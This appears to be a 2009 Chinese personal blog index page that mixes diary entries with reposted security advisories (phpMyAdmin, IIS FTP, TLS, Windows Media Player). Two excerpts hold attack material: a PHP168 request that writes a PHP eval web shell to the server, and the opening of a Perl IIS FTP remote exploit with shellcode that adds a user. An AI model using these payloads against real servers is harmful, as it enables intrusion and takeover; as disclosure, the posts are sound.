rosicky311(小浩)[HACKBASE]

百度空间 | 百度首页

招聘

文章列表

又见闹剧~关于milw0rm

2009-11-06 12:30

一直有订阅milw0rm的RSS~可最近一个多月网站都没更新~很纳闷是为啥~

看到了下面的新闻

Str0ke @ Milworm's Funeral is This Friday

Many of us have wondered where str0ke has been and why milw0rm has not been updated in a good while.

阅读全文>>

类别：无聊日记 | 评论(1) | 浏览()

安全专家发现TLS/SSL保密协议存在致命漏洞

2009-11-06 12:29

转自：CB

PhoneFactor公司的两名安全专家Marsh Ray与Steve Dispensa近日公开了他们在TLS/SSL安全协议中发现的安全漏洞。TLS (传输层保密协议Transport Layer Security)以及SSL(Socket层保密协议Secure Sockets Layer)是两个被在线零售商在网络交易过程中广泛使用的安保协议。两位专家本周四在自己的博客上公开了这两个安全协议中的漏洞，Ray今年8月份首次发现了这些漏洞，并于9月初将这些漏洞展示给Dispensa。专家们表示，

阅读全文>>

类别：网络安全 | 评论(0) | 浏览()

Windows Media Player Plugin: Local File Detection Vulnerability

2009-11-01 11:07

*** Windows Media Player Plugin: Local File Detection Vulnerability ***

A design flaw in Windows Media Player 11 allows a remote attacker to determine the \
presence of local files (programs, documents, etc.). I sent an e-mail to Microsoft \
(nearly a year ago) but they never responded…

Windows Media Player permits to open locally stored media-files. Opening \
non-supported files usually provokes an error message. By a simple HTTP-redirect, the \
error mes

阅读全文>>

类别：网络安全 | 评论(0) | 浏览()

phpMyAdmin SQL注入和跨站脚本漏洞

2009-10-25 11:24

发布时间:2009-10-12

影响版本:

phpMyAdmin 3.x
phpMyAdmin 2.11.x

漏洞描述:

BUGTRAQ  ID: 36658
CVE ID: CVE-2009-3697,CVE-2009-3696

phpMyAdmin是用PHP编写的工具，用于通过WEB管理MySQL。

phpMyAdmin没有正确地过滤对MySQL表格名称所提交的输入参数，远程攻击者可以通过提交恶意请求执行存储式跨站脚本攻击，并在用户浏览恶

阅读全文>>

类别：网络安全 | 评论(0) | 浏览()

要去客服了~

2009-10-19 11:09

业务部门3个月轮岗马上结束了~本周四就去客服培训了~
再经过3个月客服的轮岗咱就定岗了~~

类别：无聊日记 | 评论(4) | 浏览()

Microsoft IIS FTP服务器递归列表拒绝服务漏洞(MS09-053)

2009-10-17 22:32

影响版本:

Microsoft IIS 7.0
Microsoft IIS 6.0
Microsoft IIS 5.1
Microsoft IIS 5.0

漏洞描述:

BUGTRAQ  ID: 36273
CVE ID: CVE-2009-2521

Microsoft Internet信息服务（IIS）是Microsoft Windows自带的一个网络信息服务器，其中包含HTTP服务功能。

IIS的FTPd的Glob功能在处理递归目录列表请求时存在栈溢出漏洞，拥有对目录写访问权限的远程攻击者可以

阅读全文>>

类别：网络安全 | 评论(0) | 浏览()

关于网络安全类的校园招聘

2009-10-14 13:21

今天无意间在几个朋友的BLOG不约而同的看到了网络公司招聘网络安全人员~其中百度公开面对校园应届生招聘安全工程师，没记错去年的这个时候我也投了百度的简历~不过由于本人的专业和安全相差千里，投递的是别的岗位~结果被BS了~面试机会都没给~哎~尴尬

对于这个岗位，个人觉得百度也好，其他公司也好，可以适当放宽硬性指标要求，什么211，什么奖学金，什么四六级~适当的放宽些，尤其对学校~还有适当用网络力量，在各大知名的安全站点做做文章没准就能有什么收获~

毕竟这些人更多的是面对最直接的实践，说实话对于

阅读全文>>

类别：无聊日记 | 评论(6) | 浏览()

传说中的十一长假结束了~

2009-10-08 09:59

加班3天宅5天~生活过得算安逸~

类别：无聊日记 | 评论(2) | 浏览()

入职后的第一个十一加班~

2009-10-01 09:25

RT~
中心8个人加班~偌大的办公室突然很空荡~

类别：无聊日记 | 评论(2) | 浏览()

MS被和谐了一篇文章

2009-09-24 10:46

很尴尬啊~上午打开BLOG~昨天更新的文章被和谐了~

看来开心+人人的力量很强大啊~

类别：无聊日记 | 评论(0) | 浏览()

微软发布五个安全补丁全部最高关键级

2009-09-10 09:12

微软昨天凌晨如期发布了2009年9月份的五个月度安全补丁，全部属于最高级别的关键级，修复了多个秘密报告的安全漏洞，不过最新的Windows 7/Server 2008 R2不受影响。本公告摘要替代 2009 年 9 月 3 日最初发布的公告预先通知。

查看:icrosoft 安全公告摘要（2009 年 9 月）

1、公告编号：MS09-045

知识库编号：

阅读全文>>

类别：网络安全 | 评论(0) | 浏览()

PHP168 6.0及以下版本漏洞

2009-09-10 09:11

转自：鬼仔

来源：chinesehonker

危险等级：高

影响版本：PHP168 6.0以下版本

入侵者可以在用户登陆页面构造特殊语句，将PHP一句话写入cache目录，从而获得使用PHP168整站程序网站的WEBSHELL权限。

测试语句：
?makehtml=1&chdb[htmlname]=honker.php&chdb[path]=cache&content=?php%20@eval($_POST[honker]);?

类别：网络安全 | 评论(0) | 浏览()

Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)

2009-09-01 09:00

# IIS 5.0 FTPd / Remote r00t exploit 
# Win2k SP4 targets 
# bug found & exploited by Kingcope, kcope2<at>googlemail.com 
# Affects IIS6 with stack cookie protection 
# August 2009 - KEEP THIS 0DAY PRIV8 
use IO::Socket; 
$|=1; 
#metasploit shellcode, adduser "winown:nwoniw" 
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" . 
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" . 
"\x5a

阅读全文>>

类别：网络安全 | 评论(0) | 浏览()

校内网flash xss worm威胁分析

2009-08-26 14:34

PS:悲剧的百度被和谐掉了
看这里把
传送门：http://www.scanw.com/blog/archives/1133

类别：网络安全 | 评论(2) | 浏览()

招聘网站策划、运营

2009-08-24 14:43

有网游行业经验者优先，有兴趣的朋友可以把简历发我邮箱rosicky311@gmail.com

类别：默认分类 | 评论(0) | 浏览()